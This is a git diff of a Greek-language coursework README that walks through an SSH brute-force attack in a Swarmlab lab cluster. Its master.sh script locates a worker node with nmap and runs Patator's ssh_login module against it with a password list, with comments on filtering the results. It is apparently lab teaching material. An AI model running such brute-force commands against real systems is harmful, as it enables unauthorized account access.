diff --git a/2. SSH Brute Force/README.md b/2. SSH Brute Force/README.md index bf9f3a1..cb481fa 100644 --- a/2. SSH Brute Force/README.md +++ b/2. SSH Brute Force/README.md @@ -5,14 +5,37 @@ Το Patator είναι ένα εργαλείο, γραμμένο σε python, για Brute Force επιθέσεις, με εξαιρετικά μεγάλο πλήθος modules και πολλές ευέλικτες ρυθμίσεις. ### **Εγκατάσταση του Patator** -Ως kali users, έχουμε ήδη στη διάθεσή μας το συγκεκριμένο εργαλείο. Σε κάθε άλλη περίπτωση ακολουθούμε μόνο την πρώτη φορα χρήσης του τα εξής βήματα: -1. sudo apt update +Όπως και σε όλα τα ερωτήματα της εργασίας, κάθε υλοποίηση γίνεται σε ξεχωριστό φάκελο. Επομένως, **η εγκατάσταση θα γίνει εντός του SSH Brute Force directory**. Ως kali users, έχουμε ήδη στη διάθεσή μας το συγκεκριμένο εργαλείο. Σε κάθε άλλη περίπτωση ακολουθούμε μόνο την πρώτη φορα χρήσης του τα εξής βήματα: +**1. sudo apt update 2. sudo apt upgrade -y 3. sudo apt install patator -y -4. git clone https://github.com/lanjelot/patator.git +4. git clone https://github.com/lanjelot/patator.git** +_______________________________________________________________________________________ +Αφού ολοκλρωθεί η εγκατάσταση, συνδεόμαστε στον master, από τον οποίο θα υλοποιηθεί και η επίθεση. +**1. sudo ../swarmlab-sec/install/usr/share/swarmlab.io/sec/swarmlab-sec login** +Έπειτα, δημιουργήσαμε και τρέξαμε ένα script master.sh, το οποίο περιέχει όλες τις εντολές για την υλοποιήση της επίθεσης. +**2. ./master.sh** -sudo /home/andrew/swarmlab-sec/install/usr/share/swarmlab.io/sec/swarmlab-sec login +**master.sh** + +* H my_ip περιέχει την ip διεύθυνση του master. + + **my_ip=$(ifconfig eth0 | grep 'inet' | cut -d: -f2 | awk '{print $2}')** + +*H network περιέχει την ip του δικτύου, την οποία χρησιμοποιούμε για να βρούμε την ip του worker, στον οποίο θα επιτεθούμε. + + **network=$(echo $my_ip | sed 's/.[0-9]$/.*/')** + +* Στη μεταβλητή worker περιέχεται η ip του πρώτου worker, όπως αυτός υπάρχει στο σμήνος. Εάν θέλουμε να επιτεθούμε σε κάποιον άλλο worker, θα βάλουμε το επιθυμητό ψηφίο στην παράμετρο **grep worker_ψηφίο**. + +**worker=$(nmap -sP $network | grep worker_1 | awk '{print $NF}' | tr -d '()')** + + +**patator ssh_login user=$my_ip password=FILE0 0=passwords.txt host=$worker** +#emfanizei kai tis apotyximenes prospatheies +#patator ssh_login user=$my_ip password=FILE0 0=passwords.txt host=$worker -x ignore:mesg='Authentication failed.' +#emfanizei mono tin epithesi ston kwdiko pou isxuei **REFERENCES** 1. https://pentestit.medium.com/brute-force-from-ssh-to-web-dc0e986583ae